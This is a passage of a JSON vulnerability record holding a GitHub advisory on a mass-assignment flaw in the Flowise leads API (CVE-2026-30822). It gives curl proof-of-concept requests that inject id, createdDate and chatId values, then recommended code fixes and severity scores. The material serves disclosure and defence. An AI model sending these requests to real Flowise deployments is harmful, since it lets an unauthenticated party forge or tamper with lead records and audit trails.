image: flowiseai/flowise:latest\n restart: unless-stopped\n environment:\n - PORT=3000\n - DATABASE_PATH=/root/.flowise\n - DATABASE_TYPE=sqlite\n - CORS_ORIGINS=*\n - DISABLE_FLOWISE_TELEMETRY=true\n ports:\n - '3000:3000'\n volumes:\n - flowise_data:/root/.flowise\n entrypoint: /bin/sh -c \"sleep 3; flowise start\"\n\nvolumes:\n flowise_data:\n```\n\nStart the container:\n\n```bash\ndocker compose up -d\n# Wait for Flowise to be ready (about 1-2 minutes)\ncurl http://localhost:3000/api/v1/ping\n```\n\n### Step 2: Baseline Test - Normal Lead Creation\n\nFirst, create a normal lead to see expected behavior:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"chatflowid\": \"normal-chatflow-123\",\n \"name\": \"Normal User\",\n \"email\": \"normal@example.com\",\n \"phone\": \"555-0000\"\n }'\n```\n\n**Expected Response (normal behavior):**\n```json\n{\n \"id\": \"018b23e3-d6cb-4dc5-a276-922a174b44fd\",\n \"name\": \"Normal User\",\n \"email\": \"normal@example.com\",\n \"phone\": \"555-0000\",\n \"chatflowid\": \"normal-chatflow-123\",\n \"chatId\": \"auto-generated-uuid\",\n \"createdDate\": \"2025-12-26T06:20:39.000Z\"\n}\n```\n\nNote: The `id` and `createdDate` are auto-generated by the server.\n\n### Step 3: Exploit - Inject Custom ID\n\nNow inject a custom `id`:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"chatflowid\": \"attacker-chatflow-456\",\n \"name\": \"Attacker\",\n \"email\": \"attacker@evil.com\",\n \"phone\": \"555-EVIL\",\n \"id\": \"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\"\n }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n \"id\": \"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\n \"name\": \"Attacker\",\n \"email\": \"attacker@evil.com\",\n \"phone\": \"555-EVIL\",\n \"chatflowid\": \"attacker-chatflow-456\",\n \"chatId\": \"auto-generated-uuid\",\n \"createdDate\": \"2025-12-26T06:20:40.000Z\"\n}\n```\n\n**⚠️ The attacker-controlled `id` was accepted!**\n\n### Step 4: Exploit - Inject Custom Timestamp\n\nInject a fake `createdDate`:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"chatflowid\": \"timestamp-test-789\",\n \"name\": \"Time Traveler\",\n \"email\": \"timetraveler@evil.com\",\n \"createdDate\": \"1970-01-01T00:00:00.000Z\"\n }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n \"id\": \"some-auto-generated-uuid\",\n \"name\": \"Time Traveler\",\n \"email\": \"timetraveler@evil.com\",\n \"chatflowid\": \"timestamp-test-789\",\n \"chatId\": \"auto-generated-uuid\",\n \"createdDate\": \"1970-01-01T00:00:00.000Z\"\n}\n```\n\n**⚠️ The attacker-controlled timestamp from 1970 was accepted!**\n\n### Step 5: Exploit - Combined Mass Assignment\n\nInject multiple fields at once:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"chatflowid\": \"any-chatflow-attacker-wants\",\n \"name\": \"Mass Assignment Attacker\",\n \"email\": \"massassign@evil.com\",\n \"phone\": \"555-HACK\",\n \"id\": \"11111111-2222-3333-4444-555555555555\",\n \"createdDate\": \"2000-01-01T12:00:00.000Z\",\n \"chatId\": \"custom-chat-id-injected\"\n }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n \"id\": \"11111111-2222-3333-4444-555555555555\",\n \"name\": \"Mass Assignment Attacker\",\n \"email\": \"massassign@evil.com\",\n \"phone\": \"555-HACK\",\n \"chatflowid\": \"any-chatflow-attacker-wants\",\n \"chatId\": \"custom-chat-id-injected\",\n \"createdDate\": \"2000-01-01T12:00:00.000Z\"\n}\n```\n\n**⚠️ ALL three internal fields (`id`, `createdDate`, `chatId`) were controlled by the attacker!**\n\n### Verification\n\nThe exploit succeeds because:\n1. ✅ HTTP 200 response (request accepted)\n2. ✅ `id` field contains attacker-controlled UUID\n3. ✅ `createdDate` field contains attacker-controlled timestamp\n4. ✅ `chatId` field contains attacker-controlled string\n5. ✅ No authentication headers were sent\n\n---\n\n## Impact\n\n### Who is Affected?\n\n- **All Flowise deployments** that use the leads feature\n- Both **open-source** and **enterprise** versions\n- Any system that relies on lead data integrity\n\n### Attack Scenarios\n\n| Scenario | Impact |\n|----------|--------|\n| **ID Collision Attack** | Attacker creates leads with specific UUIDs, potentially overwriting existing records or causing database conflicts |\n| **Audit Trail Manipulation** | Attacker sets fake `createdDate` values to hide malicious activity or manipulate reporting |\n| **Data Integrity Violation** | Internal fields that should be server-controlled are now user-controlled |\n| **Chatflow Association** | Attacker can link leads to arbitrary chatflows they don't own |\n\n### Severity Assessment\n\nWhile this vulnerability doesn't directly expose sensitive data (unlike the IDOR vulnerability), it violates the principle that internal/auto-generated fields should not be user-controllable. This can lead to:\n\n- Data integrity issues\n- Potential business logic bypasses\n- Audit/compliance concerns\n- Foundation for chained attacks\n\n---\n\n## Recommended Fix\n\n### Option 1: Whitelist Allowed Fields (Recommended)\n\nOnly copy explicitly allowed fields from the request body:\n\n```typescript\nconst createLead = async (body: Partial) => {\n try {\n const chatId = body.chatId ?? uuidv4()\n\n const newLead = new Lead()\n \n // ✅ Only copy allowed fields\n const allowedFields = ['chatflowid', 'name', 'email', 'phone']\n for (const field of allowedFields) {\n if (body[field] !== undefined) {\n newLead[field] = body[field]\n }\n }\n newLead.chatId = chatId\n // Let TypeORM auto-generate id and createdDate\n\n const appServer = getRunningExpressApp()\n const lead = appServer.AppDataSource.getRepository(Lead).create(newLead)\n const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n return dbResponse\n } catch (error) {\n throw new InternalFlowiseError(...)\n }\n}\n```\n\n### Option 2: Use Destructuring with Explicit Fields\n\n```typescript\nconst createLead = async (body: Partial) => {\n try {\n // ✅ Only extract allowed fields\n const { chatflowid, name, email, phone } = body\n const chatId = body.chatId ?? uuidv4()\n\n const appServer = getRunningExpressApp()\n const lead = appServer.AppDataSource.getRepository(Lead).create({\n chatflowid,\n name,\n email,\n phone,\n chatId\n // id and createdDate will be auto-generated\n })\n \n const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n return dbResponse\n } catch (error) {\n throw new InternalFlowiseError(...)\n }\n}\n```\n\n### Option 3: Use class-transformer with @Exclude()\n\nAdd decorators to the Lead entity to exclude sensitive fields from assignment:\n\n```typescript\nimport { Exclude } from 'class-transformer'\n\n@Entity()\nexport class Lead implements ILead {\n @PrimaryGeneratedColumn('uuid')\n @Exclude({ toClassOnly: true }) // ✅ Prevent assignment from request\n id: string\n\n // ... other fields ...\n\n @CreateDateColumn()\n @Exclude({ toClassOnly: true }) // ✅ Prevent assignment from request\n createdDate: Date\n}\n```\n\n### Additional Recommendation\n\nConsider applying the same fix to other endpoints that use `Object.assign()` with request bodies, such as:\n- `/packages/server/src/utils/addChatMessageFeedback.ts` (similar pattern)\n\n---\n\n## Resources\n\n- [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes](https://cwe.mitre.org/data/definitions/915.html)\n- [OWASP: Mass Assignment Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)\n- [OWASP API Security Top 10 - API6:2023 Unrestricted Access to Sensitive Business Flows](https://owasp.org/API-Security/editions/2023/en/0xa6-unrestricted-access-to-sensitive-business-flows/)\n- [Node.js Security Best Practices](https://nodejs.org/en/docs/guides/security/)\n\n---", "title": "github - https://api.github.com/advisories/GHSA-mq4r-h2gh-qv7x" }, { "category": "other", "text": "0.00132", "title": "EPSS" }, { "category": "other", "text": "4.2", "title": "NCSC Score" }, { "category": "other", "text": "There is product data available from source Certbundde", "title": "NCSC Score top increasing factors" }, { "category": "other", "text": "There is exploit data available from source Nvd, Is related to (a version of) an uncommon product", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5766734", "CSAFPID-5767907", "CSAFPID-5768607" ] }, "references": [ { "category": "external", "summary": "Source - certbundde", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0626.json" }, { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-mq4r-h2gh-qv7x" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-mq4r-h2gh-qv7x" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-mq4r-h2gh-qv7x.json?alt=media" }, { "category": "external", "summary": "Source - nvd", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30822" }, { "category": "external", "summary": "Source raw - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-30822" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://www.cve.org/CVERecord?id=CVE-2026-30822" }, { "category": "external", "summary": "Source raw - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/30xxx/CVE-2026-30822.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30822" }, { "category": "external", "summary": "Source raw - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-mq4r-h2gh-qv7x" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0626.json" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0626" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j8g8-j7fc-43v6" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jc5m-wrp2-qq38" }, { "category": "external", "summary": "Reference - certbundde; cveprojectv5; github; nvd; osv", "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-mq4r-h2gh-qv7x" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wvhq-wp8g-c7vq" }, { "category": "external", "summary": "Reference - certbundde", "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x2g5-fvc2-gqvp" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-mq4r-h2gh-qv7x" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30822" } ], "scores": [ { "cvss_v3": { "version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 7.7, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5766734", "CSAFPID-5767907", "CSAFPID-5768607" ] } ], "title": "CVE-2026-30822" } ] }